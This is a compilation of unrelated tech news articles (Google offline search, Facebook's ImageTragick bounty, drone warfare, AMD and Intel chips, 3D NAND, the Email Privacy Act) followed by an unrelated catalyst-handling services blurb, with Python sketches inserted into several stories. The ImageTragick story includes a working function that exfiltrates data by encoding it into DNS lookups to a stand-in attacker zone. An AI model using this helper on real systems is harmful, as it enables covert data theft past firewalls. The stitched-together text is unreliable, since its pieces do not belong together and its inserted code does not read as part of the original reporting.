Android Google app now stores offline searches and runs them when a signal returns

Stop me if you’ve heard this one: You’re trying to read a news story about Facebook or look up the latest rumors about the Galaxy S8, and you hit a dead spot. You tap reload a couple of times, wait a few seconds, and give up.

Google feels your pain, and it doesn’t want you to miss out on valuable information just because your connection flaked out. With a new update rolling out to the Android Google app, your searches will be saved and delivered as soon as your connection returns. As Google search project manager Shekhar Sharad writes in a blog post, “The Google app will work behind-the-scenes to detect when a connection is available again and deliver your search results once completed.”

The Google app will remember any searches you make when your connection dies and notify you when they’ve been completed.

The only rub is that you’ll need to remember to use the Google app rather than Chrome for your on-the-go Googling. Google promises the new feature will have a minimal effect on battery life and data usage, but if you’d like to turn it off anyway, a new Always retry searches switch in the Offline search settings will disable it. You can also view and delete any pending queries using the new Manage searches option in the sidebar, and you can opt to have a notification alert you when a search has been completed.
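Under the hood, the behavior Google describes amounts to a persisted query queue that gets retried whenever connectivity returns, with a notification on completion. Here is a minimal conceptual sketch of that pattern in Python (the function names and timings are illustrative assumptions, not Google’s actual implementation):

```python
import socket
import time
from collections import deque

def is_online(timeout: float = 1.0) -> bool:
    """Crude connectivity check: can we reach a public DNS server?"""
    try:
        socket.create_connection(("8.8.8.8", 53), timeout=timeout).close()
        return True
    except OSError:
        return False

def run_search(query: str) -> str:
    """Stand-in for actually executing the saved search."""
    return f"results for {query!r}"

pending = deque(["galaxy s8 rumors"])   # queries saved while in a dead spot

while pending:
    if is_online():
        query = pending.popleft()
        print("notify user:", run_search(query))   # deliver results once completed
    else:
        time.sleep(30)                             # back off and retry when a signal returns
```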

The update is currently rolling out to users, but if you aren’t seeing it, you can download the Google-signed APK from APKMirror.

The bigger impact will be felt away from home. Spotty LTE connections are a problem every phone runs into, and while this update doesn’t do anything to fix them, it does make those dead spots that much more bearable. And it might make us use the Google app more to boot.

This story, “Android Google app now stores offline searches and runs them when a signal returns” was originally published by Greenbot.

Failure to patch known ImageMagick flaw for months costs Facebook $40k

It’s not common for a security-conscious internet company to leave a well-known vulnerability unpatched for months, but it happens. Facebook paid a US$40,000 reward to a researcher after he warned the company that its servers were vulnerable to an exploit called ImageTragick.

ImageTragick is the name given by the security community to a critical vulnerability that was found in the ImageMagick image processing tool back in May.

ImageMagick is a command-line tool that can resize, convert and optimize images in many formats. Web server libraries like PHP’s imagick, Ruby’s rmagick and paperclip, and Node.js’s imagemagick, used by millions of websites, are based on it.
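All of those wrappers ultimately hand the image to the ImageMagick binaries, which is why a single flaw in the tool ripples across so many sites. Here is a rough, hypothetical sketch of the common resize path, with Python standing in for the PHP/Ruby/Node wrappers and made-up file names:

```python
import subprocess

def resize_upload(src_path: str, dest_path: str, width: int, height: int) -> None:
    """Resize a user upload by shelling out to ImageMagick's `convert` tool.

    ImageMagick detects the format from the file's contents rather than its
    extension, which is what ImageTragick abused: a file named photo.jpg could
    really be an MVG/MSL script that triggers the vulnerable delegate handling.
    """
    subprocess.run(
        ["convert", src_path, "-resize", f"{width}x{height}", dest_path],
        check=True,
        timeout=30,
    )

# resize_upload("uploads/photo.jpg", "thumbs/photo.jpg", 200, 200)
```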

The ImageMagick developers attempted to patch the ImageTragick flaw after it was privately reported to them, but their fix was incomplete. Soon after, hackers started exploiting it in widespread attacks to compromise web servers.

In October, a security researcher named Andrey Leonov was investigating Facebook’s content sharing mechanism, which generates a short description for external URLs shared by users, including a resized image grabbed from the shared page.

According to the researcher, he was hoping to find a Server-Side Request Forgery (SSRF) or XML External Entity (XXE) vulnerability that he could report to Facebook and get a reward through the company’s bug bounty program.

When he failed to find such flaws, he got the idea to test for the ImageTragick flaw as a last resort, because Facebook was resizing images and there was a chance it was using this tool.

The first exploitation attempt, which was intended to execute a command on Facebook’s server that would call out to a web page on an external server, failed, Leonov explained in a blog post Tuesday.

The researcher then realized that the server might be behind a firewall that only allows requests to trusted servers. So he repeated his exploit, but this time used a DNS tunneling trick, where data is leaked to an external DNS server through DNS requests.

According to Leonov, this worked and he managed to get a directory listing from Facebook’s server relayed to his own server via DNS requests.
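DNS tunneling works because even a host that is blocked from making outbound web requests is usually still allowed to resolve hostnames, and every lookup for a name under an attacker-controlled zone is visible to that zone’s name server. A simplified, hypothetical illustration of the encoding side (the domain is made up, and real exploits chunk and label the data more carefully):

```python
import base64
import socket

ATTACKER_ZONE = "tunnel.example.com"   # hypothetical attacker-controlled DNS zone

def leak_via_dns(data: str) -> None:
    """Encode data into DNS labels and resolve them.

    The lookups themselves fail, but the authoritative name server for the
    zone still sees every query and can reassemble the payload. DNS labels
    are limited to 63 bytes, hence the chunking.
    """
    encoded = base64.b32encode(data.encode()).decode().rstrip("=").lower()
    for i in range(0, len(encoded), 60):
        try:
            socket.gethostbyname(f"{encoded[i:i + 60]}.{ATTACKER_ZONE}")
        except OSError:
            pass   # failure is expected; the query itself carries the data

# leak_via_dns("bin boot dev etc home")   # e.g. a directory listing
```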

The researcher reported the vulnerability to Facebook on Oct. 16, and the company patched it three days later after confirming it. The company paid Leonov a $40,000 bounty, one of the largest rewards it has paid for a single vulnerability report.

For webmasters, this should serve as a reminder to patch the ImageTragick flaw if they haven’t done so already. Security researcher Michal Zalewski published a blog post in May with various mitigation suggestions, including limiting which image formats ImageMagick is allowed to process and sandboxing the tool.
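One concrete version of the “limit the formats” advice is to verify an upload’s magic bytes before ImageMagick ever touches it, so a crafted MVG or MSL script can’t slip through disguised as a JPEG. A hedged sketch of such a check (the allow-list here is just an example):

```python
# Only hand files to ImageMagick if their leading bytes match a known image format.
ALLOWED_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

def sniff_image_format(path: str):
    """Return the detected format name, or None if the file isn't an allowed image type."""
    with open(path, "rb") as f:
        header = f.read(16)
    for magic, fmt in ALLOWED_MAGIC.items():
        if header.startswith(magic):
            return fmt
    return None

# if sniff_image_format("uploads/photo.jpg") is None:
#     raise ValueError("rejected: not a recognized image format")
```

The widely circulated ImageTragick policy file, which disables risky coders such as MVG, MSL, and URL, tackles the same problem from ImageMagick’s side.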

Zalewski believes ImageMagick users should drop the tool entirely in favor of libraries such as libpng, libjpeg-turbo, and giflib. That’s because ImageMagick has a long history of vulnerabilities, and tests with automated fuzzing tools have revealed many potentially exploitable bugs.

Modern warfare: Death-dealing drones and … illegal parking?

A cloud of 3D-printed drones big enough to bring down the latest U.S. stealth fighter, the F35, was just one of the combat scenarios evoked in a discussion of the future of warfare at the World Economic Forum in Davos on Wednesday.

Much of the discussion focused on the changes computers are bringing to the battlefield, including artificial intelligence and autonomous systems—but also the way the battlefield is coming to computing, with cyberwar and social media psyops an ever more real prospect.

Former U.S. Navy fighter pilot Mary Cummings, now director of the Humans and Autonomy Lab at Duke University, delivered the first strike.

“The barrier to entry to drone technology is so low that everyone can have one, and if the Chinese go out and print a million copies of a drone, a very small drone, and put those up against an F35 and they go into the engine, you basically obviate what is a very expensive platform,” she said.

Drones could not only defeat the F35, on which the U.S. is spending what Cummings called “a ridiculous amount of money,” but also replace them, she said.

“ISIS can go out now and print drones with a 3D printer, can print thousands of drones with a 3D printer at very low cost, and arm them with conventional weapons or biological weapons for example, and basically result in much more devastation than an F35 in a surgical strike could cause,” she said.

That gave Dutch Minister of Defense Jeanine Hennis-Plasschaert pause for thought. “As I placed an order for I don’t know how many F35s, I just wonder if you could advise me whether I should continue or not?” she asked Cummings.

If the perceived value of an F35 is falling, though, so too is its cost. “The price is dropping, as I understood last week from Lockheed Martin,” Hennis-Plasschaert said.

In the Netherlands, there is a hot debate on the use of autonomous weapons, according to Hennis-Plasschaert. “It’s important that the deployment of such weapons must always involve meaningful human control,” she said. On the flip side, future enemies may not feel the same way: “We may face self-learning systems that are able to modify their own rules of conduct, and so there’s this ethical question.”

That’s not the only ethical question governments will need to answer, though.

With war no longer just about territorial control, “we run the risk of cyberspace being the battle space in the future,” Hennis-Plasschaert said.

Agreeing on limits to such conflicts will be difficult, as there is insufficient cooperation between governments at the moment.

The Law of the Sea treaty is a nice example, she said, “but to copy this for cyberspace is not easy.”

There are other boundaries to set when it comes to drone warfare, too.

“We have fully autonomous defensive weapons today,” Cummings said. She wondered why they are OK, while fully autonomous offensive weapons are not.

She raised the question of future autonomous missile technology that might be able to target a person not by their GPS coordinates, as today, but by their photograph. “That missile could do a better job of targeting a bad person than a human could,” she said. That scenario would make her reluctant to put a blanket ban on autonomous offensive weapons, she said.

Targeting a specific person through their photo “really is an illustration of the blurring of the line between war and peace,” said Jean-Marie Guéhenno, president and CEO of International Crisis Group and a former UN peacekeeper. The traditional way of dealing with that would be through a court or military tribunal, he said.

Airborne drones aren’t the only autonomous vehicles that might cause concern, Cummings said.

“When we go to an internet of things for vehicles, we will have a potential worldwide connectivity of terrorism, where terrorists can get into the network and start hacking driverless cars.”

Worse still, she said, they could hack a truck. Attackers wouldn’t even need explosives on board to cause trouble, she said: Hacking half a dozen trucks in the Washington, D.C., area and stopping them in the right places could bring traffic to a halt and open the way for all sorts of mischief.

But what of social media? “Does the power of social media mean traditional military might is less important?” asked Shirley Ann Jackson, president of Rensselaer Polytechnic Institute.

Social media plays a role, said Lawrence Freedman, emeritus professor of war studies at King’s College London. “But I don’t think we should consider that new,” he said. “If we look back at the strategists of the past, what they called the psychological element was always there, was always important.”

So there you have it: In the future, war may not be declared by drones dropping destruction on our heads, but by a spate of unexplained illegal parking downtown.

AMD talks tough as it drums up support for 32-core Zen server chip

At CES, AMD launched its first Zen chips for PCs, called Ryzen. Next on deck is the 32-core server chip code-named Naples, which will ship in the coming months.

Naples doesn’t have an official name yet, but the expectations are high. While Ryzen is set up for success in PCs, it’s a different story for Naples, which has to take on Intel’s juiced-up Xeon chips, which are used in most servers today.

AMD is trying to drum up excitement for Naples, which will be released in the first half of this year. It’s promoting Naples using the same tactic as it did for Ryzen—by talking about the performance benefits of the Zen CPU.

The Zen CPU core in Naples will provide the same performance benefits as in the Ryzen chips. AMD claims a 40 percent improvement in instructions per cycle, an important metric to measure CPU performance, compared to the company’s previous Excavator architecture.
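As a rough rule of thumb, per-core throughput scales with IPC multiplied by clock speed, so a 40 percent IPC gain at an unchanged frequency translates to roughly 1.4 times the single-threaded performance. A back-of-the-envelope illustration (the clock speed is a hypothetical placeholder; only the 40 percent figure comes from AMD):

```python
# Rough model: per-core throughput ~ IPC * clock frequency.
excavator_ipc = 1.0               # normalized baseline
zen_ipc = excavator_ipc * 1.40    # AMD's claimed 40 percent IPC improvement
clock_ghz = 3.4                   # hypothetical, held constant for the comparison

uplift = (zen_ipc * clock_ghz) / (excavator_ipc * clock_ghz)
print(f"relative single-core uplift: {uplift:.2f}x")   # -> 1.40x
```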

Naples is notable for its high 32-core count, more than Intel’s Xeon chips, which have up to 24 cores. The Intel Xeon Phi supercomputing chip has up to 72 cores, but it isn’t targeted at mainstream socketed servers.

A higher core count matters because it lets servers do more, Forrest Norrod, senior vice president and general manager at AMD, said in a blog entry this week.

More data is moving into the cloud, which is putting more strain on servers in data centers. More cores will add processing power to help servers respond quickly to search requests, recognize images, and process uploaded videos faster. A server with a single CPU will be able to do as much as a current two-socket server, Norrod said.

AMD will come out with more Zen-based server chips with lower core counts, said Jim McGregor, principal analyst at Tirias Research.

The bulk of servers today use quad-core chips, so the actual market for the 32-core Naples will be limited. The server market is dominated by two-socket servers, while Intel’s 24-core chips go into four- and eight-socket servers, which are used by companies such as financial institutions that need a lot of horsepower.

“Intel has used Xeon to bleed the market” by forcing people to buy two-socket servers, and AMD could change that trend, McGregor said.

AMD will also pack in new memory bandwidth technology, which will boost server performance and possibly give it an edge over Xeon, McGregor said. It’s not clear what the technology will be, but it could be based on work from Gen-Z, a consortium that is developing a high-speed interconnect for use inside and outside servers.

AMD has surprised Intel in the server market in the past, only to self-destruct. In 2003, it came out with Opteron, the first 64-bit x86 server chip, and Intel had to scramble to catch up. AMD lost the lead when later Opteron chips based on the Bulldozer architecture underperformed and were rejected by server makers.

The company killed whatever server market presence it had with another fateful decision to switch architectures. In 2013, AMD took the radical decision to put x86 on the backburner and reboot its server strategy around ARM architecture. AMD believed the power-efficient ARM chips would ultimately replace x86 in servers and have a 20 percent market share by 2017, but that hasn’t happened.

AMD shipped its first ARM server chips early last year, but ARM chips are virtually non-existent in servers today, though the promise remains.

Realizing its mistake, AMD reversed course, moving away from ARM for servers and switching back to x86 with Zen chips. In the meantime, Intel took advantage of AMD’s missteps and steadily rolled out new Xeon chips that supported the latest technologies. Intel now holds more than a 90 percent market share in server processors.

AMD has a big challenge with 32-core Naples. Companies like Google, Facebook and Amazon are building mega data centers with servers based on Xeon. Those companies have software stacks tuned closely to the processing, I/O, power, and throughput specifications of Xeon chips, and it could be tough for AMD to break into large accounts.

But AMD’s Naples is the first legitimate x86 challenger to Xeon in years. Google, Facebook, and Amazon could use AMD’s chip as leverage to get better chip prices from Intel. Xeon chips are expensive, and the margins make them highly profitable products for Intel.

Companies won’t make a switch to AMD overnight; it could take a year or more to ensure applications work on the new chips. But the competition is good, and AMD has nowhere to go but up in the server market, McGregor said.

AMD also has some technologies that could work to its advantage. It has mulled pairing a Zen server chip with its Vega GPU, which could be useful for tasks like machine learning. The company has also released a GPU targeted at machine learning, called Radeon Instinct, but that effort is aimed at Nvidia’s Tesla GPUs, which dominate data centers.

Server wins for Naples are already coming AMD’s way. The company is also chasing the Chinese server market—which is growing fast—by licensing its Zen design to THATIC (Tianjin Haiguang Advanced Technology Investment Co.), a joint venture between AMD and a consortium of public and private Chinese companies.

Google merges YouTube, Play Music teams as it looks to create a streamlined experience

Google’s YouTube Music and Play Music apps have always been two ships in need of a single rudder, offering an overlapping set of features with separate logins and interfaces. Now, Google has taken the first step toward streamlining its music streaming experience.

According to a report by The Verge, Google has merged its YouTube Music and Google Play Music teams into a single unit, marking a first step toward a possible unified experience in a single app. While a subscription to Google Play Music or YouTube Red already includes access to the other service (and both have a decent chunk of content that can be accessed for free), Google told The Verge that improvements to the way the two services interact could be coming:

“Music is very important to Google and we’re evaluating how to bring together our music offerings to deliver the best possible product for our users, music partners and artists. Nothing will change for users today and we’ll provide plenty of notice before any changes are made.”

When asked about the rate of YouTube Red signups during Alphabet’s fourth-quarter conference call last month, Google CEO Sundar Pichai also alluded to some changes to Google’s music streaming strategy. “We have YouTube Red, YouTube Music and we do offer it across Google Play Music as well,” he said. “You will see us invest more, more countries, more original content. And we’ll bring together the experiences we have over the course of this year, so it’s even more compelling for users.”

Streaming is rapidly becoming one of the music industry’s biggest businesses, but it’s unclear how much of the pie Google actually owns. Spotify is still far and away the biggest music streaming service, with some 40 million subscribers, but Apple Music is gaining fast, having crossed the 20 million threshold after just a year and a half. However, while Google has yet to release any subscriber numbers for either Play Music or YouTube Red, which are bundled, it has a built-in advantage by pre-installing the app on most Android phones, much like Apple does with Apple Music. And a simple, single experience across YouTube and Play Music could prove to be a serious threat to Spotify’s dominance.

This story, “Google merges YouTube, Play Music teams as it looks to create a streamlined experience” was originally published by Greenbot.

Now you can control your smart devices from your Pixel, no Google Home required

One of the best features of Google Home is the ability to control all of the smart devices in your house, letting you turn on the lights or set the thermostat without fiddling with any apps or controls. Now you can use Google Assistant on your Pixel phone to do the same thing.

First spotted by Android Police, the settings menu in Google Assistant on the Pixel adds a new tab for Home control, letting you talk to your various devices without lifting a finger. And you don’t need to have a Google Home to do it. Previously, the Pixel could interact with the Home to operate Nest smart devices, but now your phone can do it all on its own.

That means you can control all of your Home-enabled smart devices, not just the ones that are owned by Alphabet. According to Android Police, the requirements appear to be version 6.12.19 of the Google app and Play Services 10.2.98. The new feature is a server-side one, however, so if you’re not seeing it on your phone, you may have to wait for Google to flip the switch.

Slowly but surely, Google Assistant on the Pixel is gaining feature parity with Google Home. While the overarching strategy for Google’s voice-operated AI is still hazy, it appears that we’re building toward some kind of a unified system, where saying “OK, Google” does the same things across all of our devices.

This story, “Now you can control your smart devices from your Pixel, no Google Home required” was originally published by Greenbot.

Intel: Cannonlake CPUs will be more than 15 percent faster than Kaby Lake

Upgrading CPU performance hasn’t been a priority for Intel in many years, but that could be changing.

Intel’s upcoming Cannonlake chips will deliver a performance improvement of more than 15 percent compared to its Kaby Lake chips, said Venkata Renduchintala, president of the Intel Client and Internet of Things businesses and Systems Architecture Group.

Intel didn’t provide exact numbers at the company’s annual investor day Thursday, but the projection is based on the SysMark benchmark. Detailed performance improvement numbers will emerge over time.

A slide from Intel’s investor day shows Intel’s projected roadmap toward its 8th-gen “Cannonlake” chip. (Credit: Agam Shah)

The performance improvements from Skylake to Kaby Lake topped out at 15 percent. The CPU performance boost for Cannonlake should be at least that, Intel said.

The first Cannonlake chips are scheduled to ship in the second half of this year. The chips—called 8th-generation chips on an Intel slide—could include Core i7 chips.

Intel showed a Cannonlake chip at CES. The chip will be the first made on Intel’s 10-nanometer process, which will deliver a substantial reduction in power consumption, Renduchintala said.

Intel may be trying to catch up with AMD, which is boasting a 40 percent performance improvement for its upcoming Ryzen chips. Ryzen’s numbers are based on IPC (instructions per cycle), an important performance metric.

The benefit of high-performance PC chips isn’t lost on Intel. The gaming market is exploding, especially eSports, and demand for high-performance Core i7 chips skyrocketed last year, Renduchintala said.

As markets like virtual reality heat up, buyers will be motivated to upgrade to Core i7 chips from Core i3 chips. The Core i7 chips today are up to 36 percent faster than Core i3 chips, Renduchintala said.

Chipmakers in past years focused on increasing performance by raising the clock frequency. But that made chips power hungry, and their focus shifted to adding cores, which boosted performance while going easier on laptop battery life. Then the focus turned to integrating technologies like graphics and I/O buses inside processors. Gaming and virtual reality have brought the focus back to raw CPU performance.

There’s a limited scope for growth in the PC market, with gaming and VR being the bright spots, and both right now require high-performance CPUs. Unlike in the past, Intel doesn’t want to sell low-margin chips that would ultimately incur a loss.

Intel was “disciplined” with its PC business, and the focus was on high-margin products like Core i7 chips. Intel’s highest-priced PC chip, the Core i7-6950X, sells for US$1,723 and generates a high profit margin for the company.

But Intel will have to contend with AMD, which is coming on strong with Ryzen. Analysts say Ryzen will start off strong in high-end gaming PCs based on the early hype, but then its success will depend on word-of-mouth recommendations. Ryzen’s subsequent success in consumer laptops and desktops will depend on PC makers adopting the chip.

Western Digital begins production of the world’s tallest 3D NAND ‘skyscraper’

Western Digital today announced that it has kicked off production of the industry’s densest 3D NAND flash chips, which stack 64 layers atop one another and store three bits of data in each cell.

The chips are based on a vertical stacking, or 3D, technology that Western Digital and partner Toshiba call BiCS (Bit Cost Scaling). WD has launched pilot production of its first 512-gigabit (Gb) 3D NAND chip based on the 64-layer technology; the memory stores three bits of data per cell and stacks those cells 64 layers high.

In the same way a skyscraper allows for greater density in a smaller footprint, stacking NAND flash cells—versus planar, or 2D, memory—lets manufacturers increase density, which lowers the cost per gigabyte of capacity. The technology also increases data reliability and improves the speed of solid-state memory.
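The density arithmetic is straightforward: a 512Gb (gigabit) die works out to 64GB, and because multiple dies are stacked in a single package, terabyte-class drives fit in very small footprints. A quick illustrative calculation (the 16-die package is an assumption for the example, not a WD specification):

```python
# Capacity math for a 512Gb (gigabit) 3D NAND die.
die_gigabits = 512
die_gigabytes = die_gigabits / 8        # 64 GB per die
dies_per_package = 16                   # hypothetical stack height, for illustration only
package_gigabytes = die_gigabytes * dies_per_package
print(f"{die_gigabytes:.0f} GB per die, about {package_gigabytes / 1024:.0f} TB per 16-die package")
# -> 64 GB per die, about 1 TB per 16-die package
```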

Three-dimensional NAND has allowed manufacturers to overcome physical limitations of NAND flash as transistor sizes approached 10 nanometers and the ability to shrink them further quickly dissipated.


The latest 3D NAND chips have been used to create gum stick-sized SSDs with more than 3.3TB of storage and standard 2.5-inch SSDs with more than 10TB of capacity.

Samsung became the first company to announce it was mass-producing 3D flash chips in 2014. Its technology, called V-NAND, originally stacked 32 layers of NAND flash. Samsung’s V-NAND also crammed three bits into each cell, in what the industry refers to as triple-level cell (TLC) or 3-bit multi-level cell (MLC) NAND. Because Samsung uses TLC memory, its chips were able to store as much as Toshiba’s original 48-layer 3D NAND chips, which held 128Gbits, or 16GB.

Intel and Micron also produce 3D NAND.

WD announced initial capacities of the world’s first 64-layer 3D NAND technology in July 2016.

Even as 2D NAND approaches scaling limits due to lithography size and error rates, layer stacking to produce 3D NAND obviates those concerns. One method of achieving 3D NAND, illustrated in a SanDisk keynote slide, places horizontally stacked word lines around a central memory hole to provide the stacked NAND bits. This configuration relaxes the requirements on lithography, the circular hole minimizes neighboring-bit disturb, and overall density is substantially increased.

Pilot production of WD’s new 64-layer 3D NAND chips began in its Yokkaichi, Japan fabrication plant, and the company plans to begin mass production in the second half of 2017.

“The launch of the industry’s first 512Gb 64-layer 3D NAND chip is another important stride forward in the advancement of our 3D NAND technology, doubling the density from when we introduced the world’s first 64-layer architecture in July 2016,” Dr. Siva Sivaram, executive vice president of memory technology for WD, said in a statement.

This story, “Western Digital begins production of the world’s tallest 3D NAND ‘skyscraper'” was originally published by Computerworld.

US House approves new privacy protections for email and the cloud

The U.S. House of Representatives approved on Monday the Email Privacy Act, which would require law enforcement agencies to get court-ordered warrants to search email and other data stored with third parties for longer than six months.

The House approved the bill by voice vote, and it now goes to the Senate for consideration.

The Email Privacy Act would update a 31-year-old law called the Electronic Communications Privacy Act (ECPA). Some privacy advocates and tech companies have pushed Congress to update ECPA since 2011. Lax protections for stored data raise doubts about U.S. cloud services among consumers and enterprises, supporters of the bill say.

Under ECPA, the protections are different for older or more recent data. Law enforcement agencies need warrants to search paper files in a suspect’s home or office and to search electronic files stored on the suspect’s computer or in the cloud for less than 180 days. But files stored for longer have less protection. Police agencies need only a subpoena, not reviewed by a judge, to demand files stored in the cloud or with other third-party providers for longer than 180 days.

That difference in the way the law treats stored data is a “glaring loophole in our privacy protection laws,” said Representative Jared Polis, a Colorado Democrat and co-sponsor of the bill.

The Email Privacy Act will bring U.S. digital privacy laws into the 21st century, said Representative Kevin Yoder, a Kansas Republican and co-sponsor of the bill.

Supporters of the bill argue internet users’ privacy expectations have changed since ECPA passed in 1986. Storage was expensive back then, and only about 10 million people had email accounts, Yoder said. Now internet users are more likely to store sensitive communications with cloud providers and other internet-based companies.

Under former President Barack Obama, the Department of Justice was cool to the idea of changing ECPA. The changes will make it tougher for law enforcement agencies to investigate crimes and terrorism, some critics say.

A similar bill passed the House by a 419-0 vote in April 2016, but the Senate failed to act and the legislation died after a new Congress was elected in November. The new version of the Email Privacy Act, introduced Jan. 9, has already collected 108 cosponsors, about a quarter of the membership of the House.

The bill would not protect internet companies from searches of their overseas servers by U.S. law enforcement agencies. Microsoft and Google have been fighting warrants for user data located outside the U.S.

Before the vote, the Consumer Technology Association urged the House to pass the bill. ECPA, which was “written before Congress could imagine U.S. citizens sharing and storing personal information on third-party servers, is woefully out of date,” Gary Shapiro, president and CEO of the CTA, said in a statement.

Catalyst Handling & Mechanical Services

Effective catalyst handling services are performed by highly skilled specialist teams. A range of services, including project planning, estimating, safety and quality planning, and execution of the client’s project, are components of catalyst handling. However, it’s possible for a specialized resource firm to engage at any stage of the client’s need.

Turnaround flows may include the establishment of safety parameters and quality requirements; resourcing and/or outsourcing tasks to other contractors and sub-contractors; and management of an internal or augmented team. The goal of any catalyst handling team is to safely execute work to ensure minimum client downtime.

Planning & Management

Catalyst handling may involve the need to carefully plan a client site shutdown months in advance. It’s often essential to mobilize a specialist team to include planning, organization, and management of the contractor team and/or any subcontractors engaged to perform the work.

The management of shutdowns must consider all necessary steps from inception and planning of the project to its final stages of plant reactivation. The catalyst handling contractor must often oversee an internal team as well as its own staff and subcontractors to accomplish the client’s job requirements. It’s often essential to operate with speed, but safety can’t be sacrificed to get the job done.

Proprietary Process

Most catalyst handling firms develop their own critical equipment and processes but the client’s needs almost always dictate access to modern refining technologies via license agreements held by other parties. In other words, the catalyst handling firm must maintain good relationships throughout the global industry and access precisely what the client needs on demand.

All catalyst handling projects are complex, so each client receives a customized project plan and estimate. The contractor firm must solve one or more specific client problems, and understanding the client’s scope of work and critical path is essential to execution. Hazard analysis and assessments are always part of the path to project completion.

Catalyst Handling Team

Some of the processes managed by an experienced catalyst handling team include: hydrocracking; sulfur recovery units (SRU); methanol reactors; sulfuric acid converters; phthalic anhydride (C₆H₄(CO)₂O); natural gas dehydration; residual desulfurization (VRDS + RDS); hydrogen desulfurization; hydro-desulfurization; hydro-treating; FCCU; single + multibed reactors; ethylene oxide, acrylic acid, VCM; ammonia synthesis converters; vinyl acetate; hydrogen; olefins production; catalytic cracking; steam methane reformers; tube sheet reactors; primary & secondary reformers; municipal potable water; and much more.

Cost Efficiency

Clients with catalyst handling requirements need a firm that can plan and execute a turnaround. Involvement at every stage of the process helps the client reduce organizational barriers and save time and money. Efficiency goals are at the heart of the process because, without step-by-step planning, it’s difficult to effectively execute the client’s goals.

The client company is always at the head of the organizational chart, and the catalyst handling team must work hand-in-hand with the client from start to finish of the project. When the project is completed, the catalyst handling team’s work isn’t finished. It’s essential to debrief the client to identify future cost savings, improvements, and best practices.